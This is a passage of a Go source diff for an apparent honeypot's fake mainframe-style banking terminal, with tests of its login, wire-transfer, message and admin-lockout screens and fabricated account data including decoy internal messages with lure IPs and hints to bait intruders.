"github.com/charmbracelet/lipgloss"
|
||||||
|
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/shell"
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/storage"
|
||||||
|
)
|
||||||
|
|
||||||
|
// newTestModel creates a model with a test session context.
|
||||||
|
func newTestModel(t *testing.T) (*model, *storage.MemoryStore) {
|
||||||
|
t.Helper()
|
||||||
|
store := storage.NewMemoryStore()
|
||||||
|
sessID, _ := store.CreateSession(context.Background(), "127.0.0.1", "banker", "banking", "")
|
||||||
|
sess := &shell.SessionContext{
|
||||||
|
SessionID: sessID,
|
||||||
|
Username: "banker",
|
||||||
|
Store: store,
|
||||||
|
}
|
||||||
|
m := newModel(sess, "SECUREBANK", "SB-0001", "NORTHEAST")
|
||||||
|
return m, store
|
||||||
|
}
|
||||||
|
|
||||||
|
// sendKeys sends a string of characters as individual key messages to the model.
|
||||||
|
func sendKeys(m *model, s string) {
|
||||||
|
for _, ch := range s {
|
||||||
|
var msg tea.KeyMsg
|
||||||
|
switch ch {
|
||||||
|
case '\r':
|
||||||
|
msg = tea.KeyMsg{Type: tea.KeyEnter}
|
||||||
|
case '\x1b':
|
||||||
|
msg = tea.KeyMsg{Type: tea.KeyEscape}
|
||||||
|
case '\x03':
|
||||||
|
msg = tea.KeyMsg{Type: tea.KeyCtrlC}
|
||||||
|
default:
|
||||||
|
msg = tea.KeyMsg{Type: tea.KeyRunes, Runes: []rune{ch}}
|
||||||
|
}
|
||||||
|
m.Update(msg)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestBankingShellName(t *testing.T) {
|
||||||
|
sh := NewBankingShell()
|
||||||
|
if sh.Name() != "banking" {
|
||||||
|
t.Errorf("Name() = %q, want %q", sh.Name(), "banking")
|
||||||
|
}
|
||||||
|
if sh.Description() == "" {
|
||||||
|
t.Error("Description() should not be empty")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestFormatCurrency(t *testing.T) {
|
||||||
|
tests := []struct {
|
||||||
|
cents int64
|
||||||
|
want string
|
||||||
|
}{
|
||||||
|
{0, "$0.00"},
|
||||||
|
{100, "$1.00"},
|
||||||
|
{4738291, "$47,382.91"},
|
||||||
|
{18254100, "$182,541.00"},
|
||||||
|
{52387450, "$523,874.50"},
|
||||||
|
{25000000, "$250,000.00"},
|
||||||
|
{-125000, "-$1,250.00"},
|
||||||
|
{99, "$0.99"},
|
||||||
|
}
|
||||||
|
for _, tt := range tests {
|
||||||
|
got := formatCurrency(tt.cents)
|
||||||
|
if got != tt.want {
|
||||||
|
t.Errorf("formatCurrency(%d) = %q, want %q", tt.cents, got, tt.want)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestNewBankState(t *testing.T) {
|
||||||
|
state := newBankState()
|
||||||
|
if len(state.Accounts) != 4 {
|
||||||
|
t.Errorf("expected 4 accounts, got %d", len(state.Accounts))
|
||||||
|
}
|
||||||
|
for _, acct := range state.Accounts {
|
||||||
|
txns, ok := state.Transactions[acct.Number]
|
||||||
|
if !ok {
|
||||||
|
t.Errorf("no transactions for account %s", acct.Number)
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
if len(txns) == 0 {
|
||||||
|
t.Errorf("account %s has no transactions", acct.Number)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if len(state.Messages) != 4 {
|
||||||
|
t.Errorf("expected 4 messages, got %d", len(state.Messages))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestLoginScreenRenders(t *testing.T) {
|
||||||
|
m, _ := newTestModel(t)
|
||||||
|
|
||||||
|
view := m.View()
|
||||||
|
if !strings.Contains(view, "SECUREBANK") {
|
||||||
|
t.Error("login should show bank name")
|
||||||
|
}
|
||||||
|
if !strings.Contains(view, "AUTHORIZED ACCESS ONLY") {
|
||||||
|
t.Error("login should show authorization warning")
|
||||||
|
}
|
||||||
|
if !strings.Contains(view, "ACCOUNT NUMBER") {
|
||||||
|
t.Error("login should prompt for account number")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestLoginFlow(t *testing.T) {
|
||||||
|
m, _ := newTestModel(t)
|
||||||
|
|
||||||
|
// Type account number.
|
||||||
|
sendKeys(m, "12345678")
|
||||||
|
view := m.View()
|
||||||
|
if !strings.Contains(view, "12345678") {
|
||||||
|
t.Error("should show typed account number")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Press enter.
|
||||||
|
sendKeys(m, "\r")
|
||||||
|
view = m.View()
|
||||||
|
if !strings.Contains(view, "PIN") {
|
||||||
|
t.Error("should show PIN prompt after entering account number")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Type PIN and enter.
|
||||||
|
sendKeys(m, "1234\r")
|
||||||
|
|
||||||
|
// Should be on menu now.
|
||||||
|
if m.screen != screenMenu {
|
||||||
|
t.Errorf("expected screenMenu, got %d", m.screen)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestMainMenuRenders(t *testing.T) {
|
||||||
|
m, _ := newTestModel(t)
|
||||||
|
sendKeys(m, "12345678\r1234\r")
|
||||||
|
|
||||||
|
view := m.View()
|
||||||
|
if !strings.Contains(view, "MAIN MENU") {
|
||||||
|
t.Error("should show MAIN MENU after login")
|
||||||
|
}
|
||||||
|
if !strings.Contains(view, "WIRE TRANSFER") {
|
||||||
|
t.Error("menu should contain WIRE TRANSFER option")
|
||||||
|
}
|
||||||
|
if !strings.Contains(view, "SECURE MESSAGES") {
|
||||||
|
t.Error("menu should contain SECURE MESSAGES option")
|
||||||
|
}
|
||||||
|
if !strings.Contains(view, "ACCOUNT SUMMARY") {
|
||||||
|
t.Error("menu should contain ACCOUNT SUMMARY option")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestAccountSummary(t *testing.T) {
|
||||||
|
m, _ := newTestModel(t)
|
||||||
|
sendKeys(m, "12345678\r1234\r") // login
|
||||||
|
sendKeys(m, "1\r") // account summary
|
||||||
|
|
||||||
|
if m.screen != screenAccountSummary {
|
||||||
|
t.Fatalf("expected screenAccountSummary, got %d", m.screen)
|
||||||
|
}
|
||||||
|
|
||||||
|
view := m.View()
|
||||||
|
if !strings.Contains(view, "ACCOUNT SUMMARY") {
|
||||||
|
t.Error("should show ACCOUNT SUMMARY")
|
||||||
|
}
|
||||||
|
if !strings.Contains(view, "CHECKING") {
|
||||||
|
t.Error("should show CHECKING account")
|
||||||
|
}
|
||||||
|
if !strings.Contains(view, "SAVINGS") {
|
||||||
|
t.Error("should show SAVINGS account")
|
||||||
|
}
|
||||||
|
if !strings.Contains(view, "TOTAL") {
|
||||||
|
t.Error("should show TOTAL")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Press any key to return.
|
||||||
|
sendKeys(m, " ")
|
||||||
|
if m.screen != screenMenu {
|
||||||
|
t.Errorf("should return to menu, got screen %d", m.screen)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestWireTransferFlow(t *testing.T) {
|
||||||
|
m, _ := newTestModel(t)
|
||||||
|
sendKeys(m, "12345678\r1234\r") // login
|
||||||
|
sendKeys(m, "3\r") // wire transfer
|
||||||
|
|
||||||
|
if m.screen != screenTransfer {
|
||||||
|
t.Fatalf("expected screenTransfer, got %d", m.screen)
|
||||||
|
}
|
||||||
|
|
||||||
|
view := m.View()
|
||||||
|
if !strings.Contains(view, "WIRE TRANSFER") {
|
||||||
|
t.Error("should show WIRE TRANSFER header")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Fill all fields.
|
||||||
|
sendKeys(m, "021000021\r") // routing
|
||||||
|
sendKeys(m, "9876543210\r") // dest account
|
||||||
|
sendKeys(m, "JOHN DOE\r") // beneficiary
|
||||||
|
sendKeys(m, "FIRST NATIONAL BANK\r") // bank name
|
||||||
|
sendKeys(m, "50000\r") // amount
|
||||||
|
sendKeys(m, "INVOICE 12345\r") // memo
|
||||||
|
|
||||||
|
// Should be on confirm step.
|
||||||
|
view = m.View()
|
||||||
|
if !strings.Contains(view, "TRANSFER SUMMARY") {
|
||||||
|
t.Error("should show TRANSFER SUMMARY for confirmation")
|
||||||
|
}
|
||||||
|
if !strings.Contains(view, "021000021") {
|
||||||
|
t.Error("summary should show routing number")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Confirm.
|
||||||
|
sendKeys(m, "Y\r")
|
||||||
|
|
||||||
|
// Auth code.
|
||||||
|
sendKeys(m, "AUTH99\r")
|
||||||
|
|
||||||
|
view = m.View()
|
||||||
|
if !strings.Contains(view, "TRANSFER QUEUED") {
|
||||||
|
t.Error("should show TRANSFER QUEUED confirmation")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check wire transfer was stored.
|
||||||
|
if len(m.state.Transfers) != 1 {
|
||||||
|
t.Fatalf("expected 1 transfer, got %d", len(m.state.Transfers))
|
||||||
|
}
|
||||||
|
wt := m.state.Transfers[0]
|
||||||
|
if wt.RoutingNumber != "021000021" {
|
||||||
|
t.Errorf("routing = %q, want %q", wt.RoutingNumber, "021000021")
|
||||||
|
}
|
||||||
|
if wt.DestAccount != "9876543210" {
|
||||||
|
t.Errorf("dest = %q, want %q", wt.DestAccount, "9876543210")
|
||||||
|
}
|
||||||
|
if wt.Beneficiary != "JOHN DOE" {
|
||||||
|
t.Errorf("beneficiary = %q, want %q", wt.Beneficiary, "JOHN DOE")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Press key to return to menu.
|
||||||
|
sendKeys(m, " ")
|
||||||
|
if m.screen != screenMenu {
|
||||||
|
t.Errorf("should return to menu after transfer, got screen %d", m.screen)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestWireTransferCancel(t *testing.T) {
|
||||||
|
m, _ := newTestModel(t)
|
||||||
|
sendKeys(m, "12345678\r1234\r") // login
|
||||||
|
sendKeys(m, "3\r") // wire transfer
|
||||||
|
sendKeys(m, "021000021\r")
|
||||||
|
sendKeys(m, "9876543210\r")
|
||||||
|
sendKeys(m, "JOHN DOE\r")
|
||||||
|
sendKeys(m, "FIRST NATIONAL BANK\r")
|
||||||
|
sendKeys(m, "50000\r")
|
||||||
|
sendKeys(m, "INVOICE 12345\r")
|
||||||
|
|
||||||
|
// Cancel at confirm step.
|
||||||
|
sendKeys(m, "N\r")
|
||||||
|
|
||||||
|
if m.screen != screenMenu {
|
||||||
|
t.Errorf("should return to menu after cancel, got screen %d", m.screen)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestTransactionHistory(t *testing.T) {
|
||||||
|
m, _ := newTestModel(t)
|
||||||
|
sendKeys(m, "12345678\r1234\r") // login
|
||||||
|
sendKeys(m, "4\r") // transaction history
|
||||||
|
|
||||||
|
if m.screen != screenHistory {
|
||||||
|
t.Fatalf("expected screenHistory, got %d", m.screen)
|
||||||
|
}
|
||||||
|
|
||||||
|
view := m.View()
|
||||||
|
if !strings.Contains(view, "TRANSACTION HISTORY") {
|
||||||
|
t.Error("should show TRANSACTION HISTORY header")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Select first account.
|
||||||
|
sendKeys(m, "1\r")
|
||||||
|
view = m.View()
|
||||||
|
if !strings.Contains(view, "DATE") {
|
||||||
|
t.Error("should show transaction list with DATE column")
|
||||||
|
}
|
||||||
|
if !strings.Contains(view, "PAGE") {
|
||||||
|
t.Error("should show page indicator")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Press B to go back to account list.
|
||||||
|
sendKeys(m, "B")
|
||||||
|
view = m.View()
|
||||||
|
if !strings.Contains(view, "SELECT ACCOUNT") {
|
||||||
|
t.Error("should return to account selection")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Press 0 to return to menu.
|
||||||
|
sendKeys(m, "0\r")
|
||||||
|
if m.screen != screenMenu {
|
||||||
|
t.Errorf("should return to menu, got screen %d", m.screen)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSecureMessages(t *testing.T) {
|
||||||
|
m, _ := newTestModel(t)
|
||||||
|
sendKeys(m, "12345678\r1234\r") // login
|
||||||
|
sendKeys(m, "5\r") // secure messages
|
||||||
|
|
||||||
|
if m.screen != screenMessages {
|
||||||
|
t.Fatalf("expected screenMessages, got %d", m.screen)
|
||||||
|
}
|
||||||
|
|
||||||
|
view := m.View()
|
||||||
|
if !strings.Contains(view, "SECURE MESSAGES") {
|
||||||
|
t.Error("should show SECURE MESSAGES header")
|
||||||
|
}
|
||||||
|
if !strings.Contains(view, "SCHEDULED MAINTENANCE") {
|
||||||
|
t.Error("should show first message subject")
|
||||||
|
}
|
||||||
|
|
||||||
|
// View first message.
|
||||||
|
sendKeys(m, "1\r")
|
||||||
|
view = m.View()
|
||||||
|
if !strings.Contains(view, "10.48.2.100") {
|
||||||
|
t.Error("message body should contain breadcrumb IP")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Press key to return to list.
|
||||||
|
sendKeys(m, " ")
|
||||||
|
|
||||||
|
// Return to menu.
|
||||||
|
sendKeys(m, "0\r")
|
||||||
|
if m.screen != screenMenu {
|
||||||
|
t.Errorf("should return to menu, got screen %d", m.screen)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestAdminAccessDenied(t *testing.T) {
|
||||||
|
m, _ := newTestModel(t)
|
||||||
|
sendKeys(m, "12345678\r1234\r") // login
|
||||||
|
sendKeys(m, "99\r") // admin
|
||||||
|
|
||||||
|
if m.screen != screenAdmin {
|
||||||
|
t.Fatalf("expected screenAdmin, got %d", m.screen)
|
||||||
|
}
|
||||||
|
|
||||||
|
view := m.View()
|
||||||
|
if !strings.Contains(view, "SYSTEM ADMINISTRATION") {
|
||||||
|
t.Error("should show SYSTEM ADMINISTRATION header")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Three failed PIN attempts.
|
||||||
|
sendKeys(m, "secret1\r")
|
||||||
|
view = m.View()
|
||||||
|
if !strings.Contains(view, "INVALID CREDENTIALS") {
|
||||||
|
t.Error("should show INVALID CREDENTIALS after first attempt")
|
||||||
|
}
|
||||||
|
|
||||||
|
sendKeys(m, "secret2\r")
|
||||||
|
sendKeys(m, "secret3\r")
|
||||||
|
|
||||||
|
view = m.View()
|
||||||
|
if !strings.Contains(view, "ACCESS DENIED") {
|
||||||
|
t.Error("should show ACCESS DENIED after 3 attempts")
|
||||||
|
}
|
||||||
|
if !strings.Contains(view, "ABEND S0C4") {
|
||||||
|
t.Error("should show COBOL-style error")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Press key to return to menu.
|
||||||
|
sendKeys(m, " ")
|
||||||
|
if m.screen != screenMenu {
|
||||||
|
t.Errorf("should return to menu after lockout, got screen %d", m.screen)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestAdminEscapeReturns(t *testing.T) {
|
||||||
|
m, _ := newTestModel(t)
|
||||||
|
sendKeys(m, "12345678\r1234\r") // login
|
||||||
|
sendKeys(m, "99\r") // admin
|
||||||
|
sendKeys(m, "\x1b") // ESC to return
|
||||||
|
|
||||||
|
if m.screen != screenMenu {
|
||||||
|
t.Errorf("ESC should return to menu from admin, got screen %d", m.screen)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestChangePin(t *testing.T) {
|
||||||
|
m, _ := newTestModel(t)
|
||||||
|
sendKeys(m, "12345678\r1234\r") // login
|
||||||
|
sendKeys(m, "6\r") // change PIN
|
||||||
|
|
||||||
|
if m.screen != screenChangePin {
|
||||||
|
t.Fatalf("expected screenChangePin, got %d", m.screen)
|
||||||
|
}
|
||||||
|
|
||||||
|
view := m.View()
|
||||||
|
if !strings.Contains(view, "CHANGE PIN") {
|
||||||
|
t.Error("should show CHANGE PIN header")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Old PIN.
|
||||||
|
sendKeys(m, "1234\r")
|
||||||
|
// New PIN.
|
||||||
|
sendKeys(m, "5678\r")
|
||||||
|
// Confirm PIN.
|
||||||
|
sendKeys(m, "5678\r")
|
||||||
|
|
||||||
|
view = m.View()
|
||||||
|
if !strings.Contains(view, "PIN CHANGED SUCCESSFULLY") {
|
||||||
|
t.Error("should show PIN CHANGED SUCCESSFULLY")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Press key to return.
|
||||||
|
sendKeys(m, " ")
|
||||||
|
if m.screen != screenMenu {
|
||||||
|
t.Errorf("should return to menu after PIN change, got screen %d", m.screen)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestLogoutExits(t *testing.T) {
|
||||||
|
m, _ := newTestModel(t)
|
||||||
|
sendKeys(m, "12345678\r1234\r") // login
|
||||||
|
sendKeys(m, "7\r") // logout
|
||||||
|
|
||||||
|
if !m.quitting {
|
||||||
|
t.Error("should be quitting after logout")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSessionLogs(t *testing.T) {
|
||||||
|
m, store := newTestModel(t)
|
||||||
|
|
||||||
|
// Send login keys and manually run returned commands.
|
||||||
|
// Type account number.
|
||||||
|
sendKeys(m, "12345678")
|
||||||
|
// Enter to advance to PIN.
|
||||||
|
sendKeys(m, "\r")
|
||||||
|
// Type PIN.
|
||||||
|
sendKeys(m, "1234")
|
||||||
|
// Enter to login — this returns a logAction cmd.
|
||||||
|
_, cmd := m.Update(tea.KeyMsg{Type: tea.KeyEnter})
|
||||||
|
if cmd != nil {
|
||||||
|
// Execute the batch of commands (login log).
|
||||||
|
execCmds(cmd)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Give async store writes a moment.
|
||||||
|
time.Sleep(50 * time.Millisecond)
|
||||||
|
|
||||||
|
if len(store.SessionLogs) == 0 {
|
||||||
|
t.Error("expected session logs to be recorded after login")
|
||||||
|
}
|
||||||
|
|
||||||
|
found := false
|
||||||
|
for _, log := range store.SessionLogs {
|
||||||
|
if strings.Contains(log.Input, "LOGIN") {
|
||||||
|
found = true
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if !found {
|
||||||
|
t.Error("expected a LOGIN entry in session logs")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Navigate to account summary — also returns a logAction cmd.
|
||||||
|
sendKeys(m, "1")
|
||||||
|
_, cmd = m.Update(tea.KeyMsg{Type: tea.KeyEnter})
|
||||||
|
if cmd != nil {
|
||||||
|
execCmds(cmd)
|
||||||
|
}
|
||||||
|
time.Sleep(50 * time.Millisecond)
|
||||||
|
|
||||||
|
foundMenu := false
|
||||||
|
for _, log := range store.SessionLogs {
|
||||||
|
if strings.Contains(log.Input, "MENU") {
|
||||||
|
foundMenu = true
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if !foundMenu {
|
||||||
|
t.Error("expected a MENU entry in session logs for account summary")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// execCmds recursively executes tea.Cmd functions (including batches).
|
||||||
|
func execCmds(cmd tea.Cmd) {
|
||||||
|
if cmd == nil {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
msg := cmd()
|
||||||
|
// tea.BatchMsg is a slice of Cmds returned by tea.Batch.
|
||||||
|
if batch, ok := msg.(tea.BatchMsg); ok {
|
||||||
|
for _, c := range batch {
|
||||||
|
execCmds(c)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestConfigString(t *testing.T) {
|
||||||
|
cfg := map[string]any{
|
||||||
|
"bank_name": "TESTBANK",
|
||||||
|
"region": "SOUTHWEST",
|
||||||
|
}
|
||||||
|
if got := configString(cfg, "bank_name", "DEFAULT"); got != "TESTBANK" {
|
||||||
|
t.Errorf("configString() = %q, want %q", got, "TESTBANK")
|
||||||
|
}
|
||||||
|
if got := configString(cfg, "missing", "DEFAULT"); got != "DEFAULT" {
|
||||||
|
t.Errorf("configString() = %q, want %q", got, "DEFAULT")
|
||||||
|
}
|
||||||
|
if got := configString(nil, "bank_name", "DEFAULT"); got != "DEFAULT" {
|
||||||
|
t.Errorf("configString(nil) = %q, want %q", got, "DEFAULT")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestScreenFrame(t *testing.T) {
|
||||||
|
frame := screenFrame("TESTBANK", "TB-0001", "NORTHEAST", "content here", 0)
|
||||||
|
if !strings.Contains(frame, "TESTBANK FEDERAL RESERVE SYSTEM") {
|
||||||
|
t.Error("frame should contain bank name in header")
|
||||||
|
}
|
||||||
|
if !strings.Contains(frame, "TB-0001") {
|
||||||
|
t.Error("frame should contain terminal ID in footer")
|
||||||
|
}
|
||||||
|
if !strings.Contains(frame, "content here") {
|
||||||
|
t.Error("frame should contain the content")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestScreenFramePadsLines(t *testing.T) {
|
||||||
|
frame := screenFrame("TESTBANK", "TB-0001", "NE", "short\n", 0)
|
||||||
|
for i, line := range strings.Split(frame, "\n") {
|
||||||
|
w := lipgloss.Width(line)
|
||||||
|
if w > 0 && w < termWidth {
|
||||||
|
t.Errorf("line %d has visual width %d, want at least %d: %q", i, w, termWidth, line)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestScreenFramePadsToHeight(t *testing.T) {
|
||||||
|
short := screenFrame("TESTBANK", "TB-0001", "NE", "line1\nline2\n", 30)
|
||||||
|
lines := strings.Count(short, "\n")
|
||||||
|
// Total newlines should be at least height-1 (since the last line has no trailing newline).
|
||||||
|
if lines < 29 {
|
||||||
|
t.Errorf("padded frame has %d newlines, want at least 29 for height=30", lines)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Without height, no padding.
|
||||||
|
noPad := screenFrame("TESTBANK", "TB-0001", "NE", "line1\nline2\n", 0)
|
||||||
|
noPadLines := strings.Count(noPad, "\n")
|
||||||
|
if noPadLines >= 29 {
|
||||||
|
t.Errorf("unpadded frame has %d newlines, should be much less than 29", noPadLines)
|
||||||
|
}
|
||||||
|
}
|
||||||
258
internal/shell/banking/data.go
Normal file
258
internal/shell/banking/data.go
Normal file
@@ -0,0 +1,258 @@
|
|||||||
|
package banking
|
||||||
|
|
||||||
|
import (
|
||||||
|
"fmt"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Account types.
|
||||||
|
const (
|
||||||
|
AcctChecking = "CHECKING"
|
||||||
|
AcctSavings = "SAVINGS"
|
||||||
|
AcctMoneyMarket = "MONEY MARKET"
|
||||||
|
AcctCertDeposit = "CERT OF DEPOSIT"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Account represents a fake bank account.
|
||||||
|
type Account struct {
|
||||||
|
Number string
|
||||||
|
Type string
|
||||||
|
Balance int64 // cents
|
||||||
|
}
|
||||||
|
|
||||||
|
// Transaction represents a fake bank transaction.
|
||||||
|
type Transaction struct {
|
||||||
|
Date string
|
||||||
|
Description string
|
||||||
|
Amount int64 // cents (negative for debits)
|
||||||
|
Balance int64 // running balance in cents
|
||||||
|
}
|
||||||
|
|
||||||
|
// SecureMessage represents a fake internal message.
|
||||||
|
type SecureMessage struct {
|
||||||
|
ID int
|
||||||
|
Date string
|
||||||
|
From string
|
||||||
|
Subj string
|
||||||
|
Body string
|
||||||
|
Unread bool
|
||||||
|
}
|
||||||
|
|
||||||
|
// WireTransfer captures data entered during the wire transfer wizard.
|
||||||
|
type WireTransfer struct {
|
||||||
|
RoutingNumber string
|
||||||
|
DestAccount string
|
||||||
|
Beneficiary string
|
||||||
|
BankName string
|
||||||
|
Amount string
|
||||||
|
Memo string
|
||||||
|
AuthCode string
|
||||||
|
}
|
||||||
|
|
||||||
|
// bankState holds all fake data for a session.
|
||||||
|
type bankState struct {
|
||||||
|
Accounts []Account
|
||||||
|
Transactions map[string][]Transaction // keyed by account number
|
||||||
|
Messages []SecureMessage
|
||||||
|
Transfers []WireTransfer
|
||||||
|
}
|
||||||
|
|
||||||
|
func newBankState() *bankState {
|
||||||
|
now := time.Now()
|
||||||
|
|
||||||
|
accounts := []Account{
|
||||||
|
{Number: "****4821", Type: AcctChecking, Balance: 4738291},
|
||||||
|
{Number: "****7203", Type: AcctSavings, Balance: 18254100},
|
||||||
|
{Number: "****9915", Type: AcctMoneyMarket, Balance: 52387450},
|
||||||
|
{Number: "****1102", Type: AcctCertDeposit, Balance: 25000000},
|
||||||
|
}
|
||||||
|
|
||||||
|
transactions := make(map[string][]Transaction)
|
||||||
|
transactions["****4821"] = generateCheckingTxns(now, accounts[0].Balance)
|
||||||
|
transactions["****7203"] = generateSavingsTxns(now, accounts[1].Balance)
|
||||||
|
transactions["****9915"] = generateMoneyMarketTxns(now, accounts[2].Balance)
|
||||||
|
transactions["****1102"] = generateCDTxns(now, accounts[3].Balance)
|
||||||
|
|
||||||
|
messages := []SecureMessage{
|
||||||
|
{
|
||||||
|
ID: 1,
|
||||||
|
Date: now.Add(-2 * 24 * time.Hour).Format("01/02/2006"),
|
||||||
|
From: "SYSTEM ADMINISTRATOR",
|
||||||
|
Subj: "SCHEDULED MAINTENANCE WINDOW",
|
||||||
|
Unread: true,
|
||||||
|
Body: fmt.Sprintf(`FROM: SYSTEM ADMINISTRATOR <sysadmin@internal.securebank.local>
|
||||||
|
DATE: %s
|
||||||
|
RE: SCHEDULED MAINTENANCE WINDOW
|
||||||
|
|
||||||
|
ALL TERMINALS WILL BE OFFLINE FOR MAINTENANCE:
|
||||||
|
DATE: %s
|
||||||
|
TIME: 02:00 - 04:00 EST
|
||||||
|
AFFECTED: ALL REGIONS
|
||||||
|
|
||||||
|
DURING THIS WINDOW, THE FOLLOWING SYSTEMS WILL BE UNAVAILABLE:
|
||||||
|
- WIRE TRANSFER PROCESSING (10.48.2.100:8443)
|
||||||
|
- ACCOUNT MANAGEMENT (10.48.2.101:8443)
|
||||||
|
- ACH BATCH PROCESSOR (10.48.2.105:9090)
|
||||||
|
|
||||||
|
PLEASE ENSURE ALL PENDING TRANSACTIONS ARE SUBMITTED BEFORE 01:30 EST.
|
||||||
|
|
||||||
|
CONTACT: HELPDESK EXT 4400 OR ops-support@internal.securebank.local`,
|
||||||
|
now.Add(-2*24*time.Hour).Format("01/02/2006 15:04"),
|
||||||
|
now.Add(5*24*time.Hour).Format("01/02/2006")),
|
||||||
|
},
|
||||||
|
{
|
||||||
|
ID: 2,
|
||||||
|
Date: now.Add(-5 * 24 * time.Hour).Format("01/02/2006"),
|
||||||
|
From: "COMPLIANCE DEPT",
|
||||||
|
Subj: "QUARTERLY AUDIT REMINDER",
|
||||||
|
Unread: true,
|
||||||
|
Body: `FROM: COMPLIANCE DEPT <compliance@internal.securebank.local>
|
||||||
|
RE: QUARTERLY AUDIT REMINDER
|
||||||
|
|
||||||
|
ALL BRANCH MANAGERS:
|
||||||
|
|
||||||
|
THE Q4 COMPLIANCE AUDIT IS SCHEDULED FOR NEXT WEEK.
|
||||||
|
PLEASE ENSURE THE FOLLOWING ARE CURRENT:
|
||||||
|
|
||||||
|
1. TRANSACTION LOGS EXPORTED TO \\FILESERV01\AUDIT\Q4
|
||||||
|
2. VAULT ACCESS CODES ROTATED (LAST ROTATION: SEE VAULT-MGMT PORTAL)
|
||||||
|
3. EMPLOYEE ACCESS REVIEWS COMPLETED IN IAM PORTAL (https://iam.internal:8443)
|
||||||
|
|
||||||
|
NOTE: DEFAULT CREDENTIALS FOR THE AUDIT PORTAL HAVE BEEN RESET.
|
||||||
|
NEW CREDENTIALS DISTRIBUTED VIA SECURE COURIER.
|
||||||
|
REFERENCE: AUDIT-2024-Q4-0847
|
||||||
|
|
||||||
|
VAULT MASTER CODE HINT: FIRST 4 OF ROUTING + BRANCH ZIP (STANDARD FORMAT)`,
|
||||||
|
},
|
||||||
|
{
|
||||||
|
ID: 3,
|
||||||
|
Date: now.Add(-8 * 24 * time.Hour).Format("01/02/2006"),
|
||||||
|
From: "IT SECURITY",
|
||||||
|
Subj: "PASSWORD POLICY UPDATE",
|
||||||
|
Unread: false,
|
||||||
|
Body: `FROM: IT SECURITY <itsec@internal.securebank.local>
|
||||||
|
RE: PASSWORD POLICY UPDATE - EFFECTIVE IMMEDIATELY
|
||||||
|
|
||||||
|
ALL STAFF:
|
||||||
|
|
||||||
|
PER FEDERAL BANKING REGULATION 12 CFR 748, THE FOLLOWING
|
||||||
|
PASSWORD POLICY IS NOW IN EFFECT:
|
||||||
|
|
||||||
|
- MINIMUM 12 CHARACTERS
|
||||||
|
- MUST CONTAIN UPPERCASE, LOWERCASE, NUMBER, SPECIAL CHAR
|
||||||
|
- 90-DAY ROTATION CYCLE
|
||||||
|
- NO REUSE OF LAST 24 PASSWORDS
|
||||||
|
|
||||||
|
LEGACY SYSTEM ACCOUNTS (MAINFRAME, AS/400) ARE EXEMPT UNTIL
|
||||||
|
MIGRATION IS COMPLETE. CURRENT LEGACY ACCESS:
|
||||||
|
MAINFRAME: telnet://10.48.1.50:23 (CICS REGION PROD1)
|
||||||
|
AS/400: tn5250://10.48.1.55 (SUBSYSTEM QINTER)
|
||||||
|
|
||||||
|
SERVICE ACCOUNT PASSWORDS ARE MANAGED VIA CYBERARK:
|
||||||
|
https://pam.internal.securebank.local:8443
|
||||||
|
|
||||||
|
TICKET: SEC-2024-1847`,
|
||||||
|
},
|
||||||
|
{
|
||||||
|
ID: 4,
|
||||||
|
Date: now.Add(-12 * 24 * time.Hour).Format("01/02/2006"),
|
||||||
|
From: "WIRE OPERATIONS",
|
||||||
|
Subj: "FEDWIRE CUTOFF TIME CHANGE",
|
||||||
|
Unread: false,
|
||||||
|
Body: `FROM: WIRE OPERATIONS <wireops@internal.securebank.local>
|
||||||
|
RE: FEDWIRE CUTOFF TIME CHANGE
|
||||||
|
|
||||||
|
